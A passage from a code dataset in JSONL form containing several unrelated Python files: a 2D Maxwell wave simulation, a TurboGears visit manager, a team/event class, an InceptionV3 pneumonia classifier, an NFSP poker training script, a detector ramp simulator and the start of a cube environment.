sparse.identity(operator_size)]\ndef next_T_tilde_matrix(B):\n if T_tilde_matrices[0] is None:\n T_tilde_matrices[0] = T_tilde_matrices[1]\n T_tilde_matrices[1] = B\n return T_tilde_matrices[1]\n else:\n next_T_tilde = B * 2 * T_tilde_matrices[1] - T_tilde_matrices[0]\n T_tilde_matrices[0] = T_tilde_matrices[1]\n T_tilde_matrices[1] = next_T_tilde\n return next_T_tilde\n\n\nH = get_hamiltonian()\n# using recursion formula for chebyshev polynomial. x's range is R rather than [-1, 1]\ndef get_evolution_operator_one_timestep():\n print(H.shape)\n eigen_factor = 2\n # print(\"det(H) : {}\".format(scipy.linalg.det(H)))\n # max_eigenvalue = eigsh(H, k=1, which=\"LA\")[0][0]\n # min_eigenvalue = eigsh(H, k=1, which=\"SA\")[0][0]\n max_eigenvalue = 16\n min_eigenvalue = -16\n print(\"max_eigenvalue : {}\".format(max_eigenvalue))\n print(\"min_eigenvalue : {}\".format(min_eigenvalue))\n z = (max_eigenvalue - min_eigenvalue) * time_step / eigen_factor\n B = ((H - sparse.identity(operator_size) * (max_eigenvalue + min_eigenvalue) / 2) / (max_eigenvalue - min_eigenvalue)) * (-1j) * eigen_factor\n # print(\"det(B) : {}\".format(scipy.linalg.det(B)))\n evolution_operator = sparse.csr_matrix((operator_size, operator_size), dtype=np.complex128)\n jv = 1\n i = 1\n while abs(jv) > allowed_error and i <= max_order_of_chebyshev_poly:\n jv = scipy.special.jv(i, z)\n # evolution_operator += jv * next_T_tilde_matrix(B)\n tmpT = jv * next_T_tilde_matrix(B) * (1j)**i\n print(i)\n # if sparse.linalg.det(tmpT) == 0:\n # print(\"{}\".format(i))\n evolution_operator += tmpT\n i += 1\n evolution_operator = (evolution_operator * 2 + sparse.identity(operator_size, dtype=np.complex128) * scipy.special.jv(0, z)) * np.exp((max_eigenvalue + min_eigenvalue) * time_step * 0.5)\n print(\"{} : {}\".format(i, abs(jv)))\n # detm = scipy.linalg.det(evolution_operator * evolution_operator.transpose().conj())\n # factor = pow(1 / detm, 1 / operator_size)\n # evolution_operator *= factor\n # print(\"{}\".format(scipy.linalg.det(evolution_operator * evolution_operator.transpose().conj())))\n return sparse.csr_matrix(evolution_operator).real\n\ndef normalize_wave(wave):\n unflattened = np.reshape(wave, ((grid_size[1] + 1) * (grid_size[0] + 1), 3))\n integral = sum([np.linalg.norm(v)**2 for v in unflattened]) / 2 * mesh_step**2\n factor = math.sqrt(1/integral)\n return wave * factor\n\nevolution_operator = get_evolution_operator_one_timestep()\nevolution_operator.data = np.ascontiguousarray(evolution_operator.data) # dot_product_mkl requires contiguous data\ncurrent_wave = get_discretized_init_wave_function()\ndef propagate_wave(steps=1):\n global current_wave\n # print(current_wave.dtype)\n # print(evolution_operator.dtype)\n # current_wave = evolution_operator.dot(fake_border(current_wave))\n for i in range(steps):\n # current_wave = normalize_wave(evolution_operator.dot(fake_border(current_wave)))\n # current_wave = normalize_wave(apply_damping(evolution_operator.dot(current_wave), damping_factor=0.9, border_size=6))\n # current_wave = normalize_wave(evolution_operator.dot(current_wave))\n current_wave = normalize_wave(dot_product_mkl(evolution_operator, current_wave))\n return current_wave\n\ndef wave2energe(wave):\n unflattened = np.reshape(wave, (grid_size[1] + 1, grid_size[0] + 1, 3))[::display_size_step, ::display_size_step, ::]\n # print(unflattened.shape)\n dis = np.array([[np.linalg.norm(v)**2 for v in unflattened[j]] for j in range(int(grid_size[1] / display_size_step) + 1)]) * 0.5\n return dis\n\n\n\nxs = np.linspace(free_plane[0], free_plane[2], int(grid_size[0] / display_size_step) + 1)\nys = np.linspace(free_plane[1], free_plane[3], int(grid_size[1] / display_size_step) + 1)\nxs, ys = np.meshgrid(xs, ys)\n\n# draw the figure\ndef update_plot(frame_number):\n ax.clear()\n # ax.set_zlim(0, 0.32 / grid_size[0])\n # ax.set_xlim(0, free_plane_length[0])\n # ax.set_ylim(0, free_plane_length[1])\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.invert_xaxis()\n propagate_wave(steps=8)\n dis = wave2energe(current_wave)\n ax.plot_surface(xs, ys, dis, cmap=\"coolwarm\")\n # es = energy_density(0)[::display_size_step, ::display_size_step]\n # ax.plot_surface(xs, ys, es, cmap=\"coolwarm\")\n print(\"{} : {} : {}\".format(frame_number, ax.elev, ax.azim))\n\nWriter = animation.writers['ffmpeg']\nwriter = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\nx_scale=1\ny_scale=1\nz_scale=1\n\nscale=np.diag([x_scale, y_scale, z_scale, 1.0])\nscale=scale*(1.0/scale.max())\nscale[3,3]=1.0\n\ndef short_proj():\n return np.dot(Axes3D.get_proj(ax), scale)\n\nax.get_proj=short_proj\nax.elev = 75\nax.azim = -90\n\nani = FuncAnimation(fig, update_plot, num_of_frames, interval=1, repeat=False)\nani.save('maxwell_2d.mp4', writer=writer)\n\n# plt.show()\n","sub_path":"maxwell_2d.py","file_name":"maxwell_2d.py","file_ext":"py","file_size_in_byte":9309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"485612551","text":"#!/bin/python3\n\nimport constants as ct\nimport os\n\ndef getDomain(fileName, equipmentType):\n file = open(fileName)\n headers = file.readline().rstrip().split()\n line = file.readline()\n domain = []\n while line:\n newItem = {}\n values = [float(x) for x in line.rstrip().split()]\n values[0] = int(values[0])\n for i in range(1, len(headers)):\n newItem[headers[i]] = values[i]\n domain.append(newItem)\n line = file.readline()\n file.close()\n return domain\ndef readDomains(domainsPath):\n domains = {}\n for fileNm in os.listdir(domainsPath):\n eqType = fileNm.split('.')[0]\n domains[eqType] = getDomain(domainsPath + fileNm, eqType)\n return domains","sub_path":"TP2/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"64274391","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\turbogears\\visit\\sovisit.py\n# Compiled at: 2011-03-26 09:20:09\nfrom datetime import datetime\nfrom sqlobject import SQLObject, SQLObjectNotFound, StringCol, DateTimeCol\nfrom sqlobject.sqlbuilder import Update\nfrom turbogears import config\nfrom turbogears.database import PackageHub\nfrom turbogears.util import load_class\nfrom turbogears.visit.api import BaseVisitManager, Visit\nhub = PackageHub('turbogears.visit')\n__connection__ = hub\nimport logging\nlog = logging.getLogger('turbogears.visit.sovisit')\nvisit_class = None\n\nclass SqlObjectVisitManager(BaseVisitManager):\n __module__ = __name__\n\n def __init__(self, timeout):\n global visit_class\n visit_class_path = config.get('visit.soprovider.model', 'turbogears.visit.sovisit.TG_Visit')\n visit_class = load_class(visit_class_path)\n if visit_class:\n log.info(\"Successfully loaded '%s'\", visit_class_path)\n super(SqlObjectVisitManager, self).__init__(timeout)\n\n def create_model(self):\n hub.begin()\n visit_class.createTable(ifNotExists=True)\n hub.commit()\n hub.end()\n log.debug('Visit model database table(s) created.')\n\n def new_visit_with_key(self, visit_key):\n hub.begin()\n visit_class(visit_key=visit_key, expiry=datetime.now() + self.timeout)\n hub.commit()\n hub.end()\n return Visit(visit_key, True)\n\n def visit_for_key(self, visit_key):\n \"\"\"Return the visit for this key.\n\n Returns None if the visit doesn't exist or has expired.\n\n \"\"\"\n try:\n expiry = self.queue[visit_key]\n except KeyError:\n visit = visit_class.lookup_visit(visit_key)\n if not visit:\n return\n expiry = visit.expiry\n\n now = datetime.now()\n if expiry < now:\n return\n self.update_visit(visit_key, now + self.timeout)\n return Visit(visit_key, False)\n\n def update_queued_visits(self, queue):\n if hub is None:\n return\n hub.begin()\n try:\n conn = hub.getConnection()\n try:\n for (visit_key, expiry) in queue.items():\n u = Update(visit_class.q, {visit_class.q.expiry.fieldName: expiry}, where=visit_class.q.visit_key == visit_key)\n conn.query(conn.sqlrepr(u))\n\n hub.commit()\n except:\n hub.rollback()\n raise\n\n finally:\n hub.end()\n return\n\n\nclass TG_Visit(SQLObject):\n __module__ = __name__\n\n class sqlmeta:\n __module__ = __name__\n table = 'visit'\n\n visit_key = StringCol(length=40, alternateID=True, alternateMethodName='by_visit_key')\n created = DateTimeCol(default=datetime.now)\n expiry = DateTimeCol()\n\n @classmethod\n def lookup_visit(cls, visit_key):\n try:\n return cls.by_visit_key(visit_key)\n except SQLObjectNotFound:\n return\n\n return","sub_path":"pycfiles/TurboGears-1.5.1-py2.4/sovisit.py","file_name":"sovisit.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"197903467","text":"class Event: #55 lines\r\n \r\n global numberOfTeams\r\n numberOfTeams = 0\r\n \r\n def __init__(self, name): #modified\r\n newEvent = name\r\n if newEvent == \"\":\r\n raise ValueError(\"Event.__init__: Instance cannot be created with a blank name.\")\r\n else:\r\n self.name = newEvent\r\n self.teams = []\r\n \r\n def addTeam(self, name): #modified\r\n global numberOfTeams\r\n \r\n newTeam = name #new\r\n #make sure this if doesn't need an else\r\n if newTeam == None:\r\n raise ValueError(\"Event.addTeam: Invalid team object; no changes made\")\r\n for i in range(0, numberOfTeams):\r\n if self.teams[i].getNumber() == newTeam.getNumber():\r\n raise ValueError(\"Event.addTeam: Team already registered for this event; no changes made\")\r\n if numberOfTeams < 20:\r\n if newTeam == None:\r\n raise ValueError(\"Event.addTeam: Team is not valid and cannot be added; no changes made\")\r\n else:\r\n self.teams.append(newTeam)\r\n numberOfTeams = numberOfTeams + 1\r\n return numberOfTeams\r\n else:\r\n raise ValueError(\"Event.addTeam: You may not have more than 20 teams\")\r\n \r\n def removeTeam(self, number):\r\n global numberOfTeams\r\n if numberOfTeams == 0:\r\n raise ValueError(\"Event.removeTeam: There are no teams registered for this event\")\r\n for i in range(0, numberOfTeams):\r\n if self.teams[i].getNumber() == number:\r\n self.teams.remove(self.teams[i])\r\n numberOfTeams = numberOfTeams - 1\r\n return numberOfTeams\r\n elif i == (numberOfTeams - 1):\r\n raise ValueError(\"Event.removeTeam: The desired team was not found in this event\")\r\n \r\n def getName(self):\r\n return self.name\r\n \r\n def getTeamCount(self):\r\n return numberOfTeams\r\n \r\n def getTeamByNumber(self, number):\r\n for i in range(0, numberOfTeams):\r\n if self.teams[i].getNumber() == number:\r\n return self.teams[i]\r\n elif i == (numberOfTeams - 1):\r\n raise ValueError(\"Event.getTeamByNumber: This team is not on this event.\")\r\n \r\n def getTeamByParticipant(self, number):\r\n foundTeam = False\r\n for i in range(0, len(self.teams)):\r\n for j in range(0, len(self.teams[i].participants)):\r\n if self.teams[i].participants[j].getNumber() == number:\r\n return self.teams[i]\r\n if foundTeam == False:\r\n raise ValueError(\"Event.getTeamByParticipant: This participant is not on this event.\")","sub_path":"Auburn school projects [archive]/U. Fa2013/5700 Process [Python]/eclipse workspace[code for CA:Code Assnmnts]/aew0024/CA02/prod/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"29085823","text":"import os\nimport fileinput\nimport sys\nfrom optparse import OptionParser\n\nparser = OptionParser()\nparser.add_option(\"-p\", \"--path\", dest=\"directory\",\n help=\"Specify input directory containing the .root files.\", metavar=\"PATH\")\nparser.add_option(\"-t\", \"--tag\", dest=\"tag\",\n help=\"Specify name of sample to make list and output .txt file.\", metavar=\"TAG\")\nparser.add_option(\"-y\", \"--year\", dest=\"year\",\n help=\"Specify year of produced sample.\", metavar=\"YEAR\")\n\n(options, args) = parser.parse_args()\n\ndirectory = options.directory\ntag = options.tag\nyeartag = options.year\n\nif not directory:\n sys.exit(\"You need to specify the directory! (See help).\")\nif not tag:\n sys.exit(\"You need to specify sample name.\")\n\nfor folder in os.listdir(directory):\n if folder.startswith(tag) and not folder.endswith('.root'):\n for rootfile in os.listdir(directory+folder):\n if not yeartag:\n with open('samples/Efficiency/'+tag+'.txt', 'a') as ofile:\n ofile.write(directory+folder+'/'+rootfile + os.linesep)\n else:\n with open('samples/Efficiency/'+tag+'_'+yeartag+'.txt', 'a') as ofile:\n ofile.write(directory+folder+'/'+rootfile + os.linesep)\n","sub_path":"scripts/makeEffList.py","file_name":"makeEffList.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399054306","text":"# import pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport numpy as np\nimport cv2\nfrom keras import applications, Sequential, Model, optimizers\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping\nfrom keras.layers import Flatten, Dense\nfrom keras.utils import to_categorical\nfrom tqdm import tqdm\nimport os\nimport skimage.transform\n\ntrainInput = \"chest-xray-pneumonia/chest_xray/chest_xray/train/\"\ntestInput = \"chest-xray-pneumonia/chest_xray/chest_xray/test/\"\nsize = 199\nbatchSize = 32\nepochs = 3\n\n\ndef extractData(directory):\n labels = []\n images = []\n\n for nextDirectory in os.listdir(directory):\n if not nextDirectory.startswith(\".\"):\n if nextDirectory in \"NORMAL\":\n label = 0\n elif nextDirectory in \"PNEUMONIA\":\n label = 1\n else:\n label = 2\n\n currentDirectory = directory + nextDirectory\n if not currentDirectory.startswith(\".\"):\n for files in tqdm(os.listdir(currentDirectory)):\n if files.endswith('.jpg') or files.endswith('.jpeg'):\n imagePath = currentDirectory + \"/\" + files\n img = cv2.imread(imagePath)\n img = skimage.transform.resize(img, (size, size, 3))\n img = np.asarray(img)\n labels.append(label)\n images.append(img)\n # cv2.imshow('image', img)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n labels = np.asarray(labels)\n images = np.asarray(images)\n return labels, images\n\n\nlabelsTrain, imagesTrain = extractData(trainInput)\nlabelsTest, imagesTest = extractData(testInput)\n\n# imagesTrain = imagesTrain.reshape(5216, 3, size, size)\n# imagesTest = imagesTest.reshape(624, 3, size, size)\n# labelsTrain = to_categorical(labelsTrain, 2)\n# labelsTest = to_categorical(labelsTest, 2)\nprint(\"Train:\", imagesTrain.shape, \"Test:\", imagesTest.shape)\nprint(\"Train:\", labelsTrain.shape, \"Test:\", labelsTest.shape)\n\ninceptionv3 = applications.InceptionV3(weights='imagenet', include_top=False, input_shape=(size, size, 3))\naddModel = Sequential()\n\naddModel.add(Flatten(input_shape=inceptionv3.output_shape[1:]))\naddModel.add(Dense(256, activation='relu'))\naddModel.add(Dense(128, activation='relu'))\naddModel.add(Dense(2, activation='softmax'))\n\nmodelv3 = Model(inputs=inceptionv3.input, outputs=addModel(inceptionv3.output))\nmodelv3.compile(loss='categorical_crossentropy', optimizer=optimizers.SGD(lr=1e-4, momentum=0.9), metrics=['accuracy'])\n\n# reduceLearningRate = ReduceLROnPlateau(monitor='val_acc', factor=0.1, epsilon=0.0001, patience=1, verbose=1)\n\nreduceLearningRate = ReduceLROnPlateau(monitor='loss', factor=0.1, patience=2, cooldown=2, min_lr=0.001, verbose=1)\nearlyStop = EarlyStopping(monitor='val_loss', patience=5, verbose=1)\n\ncallbacks = [reduceLearningRate, earlyStop]\n\ntimeStart = time.time()\nhistory = modelv3.fit(imagesTrain, labelsTrain,\n validation_data=(imagesTest, labelsTest),\n callbacks=[reduceLearningRate, earlyStop], epochs=epochs)\nprint(\"InceptionV3 model\", str(round((time.time() - timeStart) / 60, 2)))\n\n\"\"\"History in graphs\"\"\"\n\nplt.plot(history.history[\"accuracy\"])\nplt.plot(history.history[\"val_accuracy\"])\nplt.title(\"Accuracy\")\nplt.ylabel(\"Accuracy\")\nplt.xlabel(\"Epoch\")\nplt.legend([\"Train\", \"Test\"], loc=\"upper left\")\nplt.show()\n\nplt.plot(history.history[\"loss\"])\nplt.plot(history.history[\"val_loss\"])\nplt.title(\"Loss\")\nplt.ylabel(\"Loss\")\nplt.xlabel(\"Epoch\")\nplt.legend([\"Train\", \"Test\"], loc=\"upper left\")\nplt.show()\n","sub_path":"PneumoniaDetect.py","file_name":"PneumoniaDetect.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"629855652","text":"''' An example of learning a NFSP Agent on Limit Texas Holdem\n'''\n\nimport tensorflow as tf\n\nimport rlcard\nfrom rlcard.agents.nfsp_agent import NFSPAgent\nfrom rlcard.agents.random_agent import RandomAgent\nfrom rlcard.utils.utils import set_global_seed\nfrom rlcard.utils.logger import Logger\n\n# Make environment\nenv = rlcard.make('limit-holdem')\neval_env = rlcard.make('limit-holdem')\n\n# Set the iterations numbers and how frequently we evaluate/save plot\nevaluate_every = 100\nsave_plot_every = 1000\nevaluate_num = 10000\nepisode_num = 10000000\n\n# Set the the number of steps for collecting normalization statistics\n# and intial memory size\nmemory_init_size = 1000\nnorm_step = 1000\n\n# The paths for saving the logs and learning curves\nroot_path = './experiments/limit_holdem_nfsp_result/'\nlog_path = root_path + 'log.txt'\ncsv_path = root_path + 'performance.csv'\nfigure_path = root_path + 'figures/'\n\n# Set a global seed\nset_global_seed(0)\n\nwith tf.Session() as sess:\n # Set agents\n global_step = tf.Variable(0, name='global_step', trainable=False)\n agents = []\n for i in range(env.player_num):\n agent = NFSPAgent(sess,\n scope='nfsp' + str(i),\n action_num=env.action_num,\n state_shape=env.state_shape,\n hidden_layers_sizes=[512,512],\n anticipatory_param=0.1,\n min_buffer_size_to_learn=memory_init_size,\n q_replay_memory_init_size=memory_init_size,\n q_norm_step=norm_step,\n q_mlp_layers=[512,512])\n agents.append(agent)\n\n sess.run(tf.global_variables_initializer())\n\n random_agent = RandomAgent(action_num=eval_env.action_num)\n\n env.set_agents(agents)\n eval_env.set_agents([agents[0], random_agent])\n\n # Count the number of steps\n step_counters = [0 for _ in range(env.player_num)]\n\n # Init a Logger to plot the learning curve\n logger = Logger(xlabel='timestep', ylabel='reward', legend='NFSP on Limit Texas Holdem', log_path=log_path, csv_path=csv_path)\n\n for episode in range(episode_num):\n\n # First sample a policy for the episode\n for agent in agents:\n agent.sample_episode_policy()\n\n # Generate data from the environment\n trajectories, _ = env.run(is_training=True)\n\n # Feed transitions into agent memory, and train the agent\n for i in range(env.player_num):\n for ts in trajectories[i]:\n agents[i].feed(ts)\n step_counters[i] += 1\n\n # Train the agent\n train_count = step_counters[i] - (memory_init_size + norm_step)\n if train_count > 0 and train_count % 64 == 0:\n rl_loss = agents[i].train_rl()\n sl_loss = agents[i].train_sl()\n print('\\rINFO - Agent {}, step {}, rl-loss: {}, sl-loss: {}'.format(i, step_counters[i], rl_loss, sl_loss), end='')\n\n # Evaluate the performance. Play with random agents.\n if episode % evaluate_every == 0:\n reward = 0\n for eval_episode in range(evaluate_num):\n _, payoffs = eval_env.run(is_training=False)\n reward += payoffs[0]\n\n logger.log('\\n########## Evaluation ##########')\n logger.log('Timestep: {} Average reward is {}'.format(env.timestep, float(reward)/evaluate_num))\n\n # Add point to logger\n logger.add_point(x=env.timestep, y=float(reward)/evaluate_num)\n\n # Make plot\n if episode % save_plot_every == 0 and episode > 0:\n logger.make_plot(save_path=figure_path+str(episode)+'.png')\n\n # Make the final plot\n logger.make_plot(save_path=figure_path+'final_'+str(episode)+'.png')\n","sub_path":"examples/limit_holdem_nfsp.py","file_name":"limit_holdem_nfsp.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"479885056","text":"from astropy.io import fits\nfrom astropy.io import ascii\nfrom make_random_trace import make_random_trace\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter, AutoMinorLocator)\nimport datetime\nimport os\nimport shutil\nimport json\nimport re\nimport sys\n\nplt.style.use('seaborn-white')\nsys.stdout.flush()\n\n\ndef MACCsimulator( ng=15, nf=16, nd=11, darkcurrent = 0.04, lightcurrent = 10., \n nonlin = -5.0e-5, readnoise = 9., \n RTN1 = False, RTN2 = False, RTN3 = False,\n plots = True ):\n\n\n # Frame time\n tf = 1.4548 # tf = 1.42 in DPU test Sec. 8.2.\n\n # FP average e-/ADU gain\n detGain = 1.3 # detGain = 1/1.4 DPU test; typos \"8.4\"?\n\n # Dark current e-/sec\n # darkrkcurrent = 0.04 nominal\n\n # Light current e-/sec\n # lightcurrent = 10. 52 is LED set point. 2 is Zody.\n\n # Non-linearity 2nd order coefficent\n # nonlin = -5.0e-5 \n\n # ADU offset added by DPU\n offsetADU = 0. # offsetADU = 1024 or 0 depends on DPU or ground fitting.\n\n # readnoise in e-. 9-10 e- per frame is nominal.\n sigmaRead = readnoise/detGain # ADU\n\n # noiseless total fluence\n fluence = ( darkcurrent + lightcurrent )/ detGain # ADU/sec\n\n # group and integration times\n tgrp = (nf + nd)*tf\n tint = (ng-1.)*(nf+nd)*tf\n\n # Readout count\n nreads = int((ng*nf + (ng-1.)*nd))\n\n # Total exposure time\n texp = nreads*tf\n\n # time vector\n read = np.arange(nreads)\n tread = read*tf\n\n fdark = fluence*tread + nonlin*((fluence*tread)**2) # curved signal\n\n ## Sone references from the DPU Manual\n ## P. 48 test\n ##myPixel = [511, 511]\n ##myPixelSlope = 2.179638\n ##myPixelChi2Temp = 30.748461\n ##myPixelSignal = 31.0 \n\n # Add read noise\n rg = np.random.rand(nreads) \n fdarkN = fdark + rg * sigmaRead / np.max(rg) \n\n ## Some testing\n ##y[Range(9,12)] += np.float([5,10,7]) # make some peak\n ## define a model: GaussModel + background polynomial\n ##gauss = GaussModel( ) # Gaussian\n ##gauss += PolynomialModel( 1 ) # add linear background\n ##gauss.setParameters( np.float([1,1,0.1,0,0]) ) # initial parameter guess\n ##print gauss.getNumberOfParameters() # 5 (= 3 for Gauss + 2 for line)\n ##gauss.keepFixed( int([2]), np.float([0.1])) \n\n # Add RTN. These should be cast into their own functions at some point.\n\n ru = np.random.uniform\n\n # RTN Type 1\n if RTN1:\n # in principle the first two parameters in make_random_trace function, \n # setting the number of elements and rate, should be set into the main PF \n # for more user control. Here the values are just examples, after some \n # playing around to get them in the RTN ball park. \n k=0.2\n sRTN, tRTN = make_random_trace(2000,k,0) \n \n sRTNterp = ru(200)*np.interp(tread,tRTN,sRTN)\n #onoff = np.round(ru( np.float(nreads) ))\n fon = ru(0.0)\n if (fon < 0.5):\n fon = 0.5 # At least 50%\n for RTN in range(0,nreads):\n # Generate a random number to decide if this readout is telegraphing\n # or not.\n on = ru(0.0)\n if (on <= fon):\n fdarkN[RTN] += sRTNterp[RTN]*np.mean(fdarkN)\n annRTN = \"Type 1; fon = \"+str(fon)[0:4]\n\n # RTN Type 2\n if RTN2:\n fon = ru(0.0) # frequency of readouts that should have RTN\n if (fon < 0.2): \n fon = 0.2 # At least 20%.\n level = 0.2*np.mean(fdarkN) # RTN maximum offset from nominal\n level = level*ru(0.0)\n for RTN in range(0,nreads):\n # Generate a random number to decide if this readout is telegraphing \n # or not.\n on = ru(0.0) \n if (on <= fon):\n fdarkN[RTN] += level\n annRTN = \"Type 2; level = \"+str(level)[0:5]+\" ADU; fon = \"+str(fon)[0:4]\n\n # RTN Type 3\n if RTN3:\n k=0.2\n sRTN, tRTN = make_random_trace(2000,k,0)\n\n sRTNterp = np.interp(tread,tRTN,sRTN)\n onoff = np.round(ru( np.float(nreads) ))\n fdarkN = fdarkN + sRTNterp*0.15*np.mean(fdarkN)*onoff\n annRTN = \"Type 3\"\n\n if not (RTN1 or RTN2 or RTN3):\n annRTN = \"NONE\"\n\n # Begin Slope Calculations, following the DPU S/W specification.\n # Set alpha = 0 to remove Poisson noise correlations.\n alpha = (1 - (nf**2))/(3.*nf*(nf+nd)) \n\n # beta = 2.*detGain*(sigmaRead**2)/(nf*(alpha+1)) # Kubik ChiSq description\n beta = 2.*(sigmaRead**2)/(nf*(alpha+1)) \n\n # Select the ng*nf frames which have not been dropped by the DPU\n s2 = np.float()\n t2 = np.float()\n for i in range(nreads):\n if i % int(nf+nd) in (range(nf)):\n s = fdarkN[i]\n t = tread[i]\n s2 = np.append(s2, s)\n t2 = np.append(t2, t) \n\n # Average each group\n fgrp = np.reshape(s2[1:],[ng,nf])\n tgrp = np.reshape(t2[1:],[ng,nf])\n\n fgrpavg = np.float()\n tgrpavg = np.float()\n\n for i in range(ng):\n fga = np.mean(fgrp[i,:])\n tga = np.mean(tgrp[i,:])\n fgrpavg = np.append(fgrpavg, fga)\n tgrpavg = np.append(tgrpavg, tga)\n\n fgrpavg = fgrpavg[1:]\n tgrpavg = tgrpavg[1:]\n\n # Sum the signal differences\n # First set which samples to fit, either fgrpavg for the groups, or fdarkN\n # for the full ramp.\n L = fgrpavg \n # Similarly select the apppropriate time grid, either tgrpavg for group \n # averages or tf for the full ramp. \n deltaT = tgrpavg[1]-tgrpavg[0] \n a = 1\n # Use ng to fit the group averages, nreads for the full ramp. \n b = ng\n\n def sumRange(L,a,b,printslopes): \n s = 0 \n for i in range(a,b): \n if printslopes:\n if i == a:\n print('Group slopes:')\n print(i, ' ', L[i] - L[i-1])\n s += pow((L[i] - L[i-1]) + beta,2) \n return s \n \n print('sum = ',sumRange(L,a,b,0)) \n\n # Slope terms\n #slopeDPU_1 = np.sqrt( 1 + 4 * (detGain**2)*( sumRange(L,a,b,1)/((ng - 1)*((1+alpha)**2)) ) ) # Kubik\n slopeDPU_1 = np.sqrt( 1 + 4 * ( sumRange(L,a,b,1)/((ng - 1)*((1+alpha)**2)) ) ) # DPU Manual\n #slopeDPU_0 = (1 + alpha) / (2.*detGain) # Kubik \n slopeDPU_0 = (1 + alpha) / 2. # DPU manual\n\n slopeDPU = slopeDPU_0 * (slopeDPU_1 - 1) - beta\n print('Slope DPU = ', slopeDPU)\n\n signalDPU = slopeDPU * (ng - 1) + offsetADU # Downlinked signal in ADU\n print('Signal DPU = ', signalDPU)\n\n # Quality Factor\n\n pseudoFlux = np.sqrt ( sumRange(L,a,b,0) / (ng - 1) ) - beta\n print('Pseudo flux ghat_x = ',pseudoFlux)\n\n QF = ( 2*detGain/(1+alpha) ) * ( (ng - 1)*pseudoFlux - (fgrpavg[ng-1] - fgrpavg[0]) )\n print('Quality Flag = ', QF) \n\n # Simple least squares fit to the full ramp for comparison\n coeff = poly.polyfit(tread[1:], fdarkN[1:], 1)\n ffit = poly.polyval(tread[1:], coeff)\n\n #coeff = np.polyfit(tread, fdarkN, 1)\n #print(coeff)\n #umodel = np.poly1d(coeff)\n \n chisqr = np.sum((poly.polyval(tread, coeff) - fdarkN) ** 2) / np.std(fdarkN)\n\n print(\"Slope Polyfit(1) = \", coeff[0],\" Chi-Squared = \", chisqr)\n\n # Plotting\n\n if plots:\n figstr = 'MACC('+str(ng)+','+str(nf)+','+str(nd)+')'\n plt.ion()\n fig, ax = plt.subplots(figsize=(8,5.5))\n\n ax.plot(tread, fdarkN, 'o',linestyle='',\n markersize=5,mfc='none',mec='black',\n label='Dropped Readouts')\n\n ax.set(xlabel='time (s)', ylabel='signal (ADU)',\n title=figstr)\n\n ax.tick_params(axis='both', which='both',length=2)\n\n ax.plot(t2[1:], s2[1:], 'o', linestyle='',\n markersize=5, mfc='blue',mec='none',\n label='Group Readouts')\n\n ax.plot(tgrpavg,fgrpavg, 'o', linestyle='',\n markersize=7,mfc='red',\n label='Group Averages')\n \n ax.plot(tread[1:], ffit, linestyle=':',color='g',\n label='LSQ')\n\n plt.axhline(y=signalDPU, color='r', linestyle='--')\n\n plt.legend(loc='lower right')\n\n ymin, ymax = ax.get_ylim()\n xmin, xmax = ax.get_xlim()\n delY = ymax-ymin\n delX = xmax-xmin\n\n annX = xmin + 0.05*delX\n\n annY1 = ymax - 0.2*delY\n sarray = 'fluence: '+np.str(fluence*detGain)+' e-/sec' + '\\n' + \\\n 'read noise: '+np.str(sigmaRead*detGain)+' e-' + '\\n' + \\\n 'a2: '+str(nonlin) + '\\n' + \\\n 'RTN: '+annRTN \n ax.annotate(sarray,(annX,annY1))\n\n annY2 = ymax - 0.3*delY\n sarray2 = r'$\\alpha$: ' + np.str(alpha)[0:4]+ r' $\\beta$: ' +np.str(beta)[0:4] + '\\n' + \\\n 'DPU Signal: '+np.str(signalDPU)[0:6]+' ADU; QF: '+np.str(QF)[0:4]\n ax.annotate(sarray2,(annX,annY2),color='r')\n\n plt.show()\n","sub_path":".ipynb_checkpoints/MACCsimulatorV2-checkpoint.py","file_name":"MACCsimulatorV2-checkpoint.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"272297466","text":"import numpy as np\nimport gin\nimport gym\n\nfrom pddm.envs.cube import cube_env\n\n# rotate 20 deg about y axis (cos(a/2), sin(a/2), 0, 0) (up/down)\n# rotate 20 deg about z axis (cos(a/2), 0, 0, sin(a/2)) (left/right)\n\nGOAL_TASKS = {\n 'left': [0, 0, -1.5],\n 'right': [0, 0, 1.5],\n 'up': [1.5, 0, 0],\n 'down': [-1.5, 0, 0],\n\n 'half_up': [0.7, 0, 0],\n 'half_down': [-0.7, 0, 0],\n 'half_left': [0, 0, -0.7],\n 'half_right': [0, 0, 0.7],\n\n 'slight_up': [0.35, 0, 0],\n 'slight_down': [-0.35, 0, 0],\n 'slight_left': [0, 0, -0.35],\n 'slight_right': [0, 0, 0.35],\n}\n\n#####################################\n#####################################\n\n\nclass SafemrlCubeEnv(cube_env.CubeEnv):\n\n def __init__(self, same_goals=False, goal_task=('left', 'right', 'up', 'down'),\n max_steps=100):\n 